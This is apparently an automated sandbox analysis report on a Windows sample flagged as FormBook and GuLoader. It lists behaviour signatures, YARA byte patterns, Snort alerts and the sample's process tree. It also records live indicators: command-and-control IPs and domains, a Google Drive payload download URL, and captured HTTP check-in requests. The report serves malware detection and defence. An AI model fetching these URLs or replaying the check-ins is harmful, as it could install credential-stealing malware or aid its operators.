Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FRA.0038253.exe

Overview

General Information

Sample name:FRA.0038253.exe
Analysis ID:1445848
MD5:b07b3994ad66a39937d9081eb64cd5f5
SHA1:3fffe0fb2721f440909f99c5cb74d1d556ac45bb
SHA256:53501f12261fc6003fb771379846bfc0bad23e331f0ccde984c431c22901881f
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • FRA.0038253.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\FRA.0038253.exe" MD5: B07B3994AD66A39937D9081EB64CD5F5)
    • FRA.0038253.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\FRA.0038253.exe" MD5: B07B3994AD66A39937D9081EB64CD5F5)
      • aqqPMpTRvveOzLCNSEwwpwdiQeo.exe (PID: 2592 cmdline: "C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 3636 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 3C9AD13D268D1DFB106DD8C2017478C2)
          • aqqPMpTRvveOzLCNSEwwpwdiQeo.exe (PID: 7248 cmdline: "C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:05/22/24-17:32:25.365112
        SID:2855464
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:17.446010
        SID:2855464
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:47.604534
        SID:2855465
        Source Port:49857
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:28.207675
        SID:2855464
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:02.013326
        SID:2855464
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:05.630665
        SID:2855464
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:10.120994
        SID:2855465
        Source Port:49837
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:55.882236
        SID:2855464
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:26.063885
        SID:2855465
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:11.593194
        SID:2855464
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:38.705824
        SID:2855464
        Source Port:49854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:04.716804
        SID:2855464
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:40.434447
        SID:2855464
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:56.756415
        SID:2855465
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:14.708140
        SID:2855465
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:05.996160
        SID:2855464
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:40.369095
        SID:2855465
        Source Port:49841
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:12.283785
        SID:2855465
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:47.971615
        SID:2855464
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:17.064158
        SID:2855465
        Source Port:49849
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:33.605540
        SID:2855465
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:42.460525
        SID:2855464
        Source Port:49821
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:51.093524
        SID:2855465
        Source Port:49824
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:31.276565
        SID:2855465
        Source Port:49853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:50.831928
        SID:2855464
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:08.664446
        SID:2855464
        Source Port:49826
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:22.652530
        SID:2855464
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:31.097387
        SID:2855464
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:31.825253
        SID:2855465
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:53.173985
        SID:2855464
        Source Port:49801
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:34.866076
        SID:2855464
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:54.305818
        SID:2855464
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:41.668322
        SID:2855464
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:08.860967
        SID:2855464
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:03.208013
        SID:2855465
        Source Port:49845
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:31:36.884895
        SID:2855465
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:20.315661
        SID:2855464
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:32.118312
        SID:2855464
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:28.113117
        SID:2855464
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:11.463863
        SID:2855465
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:45.336821
        SID:2855464
        Source Port:49822
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:36:25.526064
        SID:2855464
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:46.221949
        SID:2855465
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:32:01.287665
        SID:2855465
        Source Port:49804
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:33:03.263104
        SID:2855464
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:34:37.539385
        SID:2855464
        Source Port:49830
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/22/24-17:35:57.219108
        SID:2855464
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: FRA.0038253.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://www.tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xYAvira URL Cloud: Label: malware
        Source: http://www.tycent520test.com/op6t/Avira URL Cloud: Label: malware
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: FRA.0038253.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.69.206:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.33.97:443 -> 192.168.11.30:49794 version: TLS 1.2
        Source: FRA.0038253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: FRA.0038253.exe, FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004065EA FindFirstFileA,FindClose,0_2_004065EA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49796 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49797 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49798 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49800 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49801 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49802 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49804 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49805 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49806 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49808 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49809 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49810 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49812 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49813 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49814 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49816 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49817 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49818 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49820 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49821 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49822 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49824 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49825 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49826 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49828 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49829 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49830 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49831 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49833 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49834 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49835 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49837 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49838 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49839 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49841 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49842 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49843 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49845 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49846 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49847 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49849 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49850 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49851 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49853 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49854 -> 35.213.232.35:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49855 -> 35.213.232.35:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49857 -> 35.213.232.35:80
        Source: Joe Sandbox ViewIP Address: 139.162.5.234 139.162.5.234
        Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
        Source: Joe Sandbox ViewIP Address: 47.243.134.243 47.243.134.243
        Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
        Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.l7aeh.usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.tycent520test.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.century21morenoycia.mxConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.facesofhoustontx.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.cngdesk.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.shortfox.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
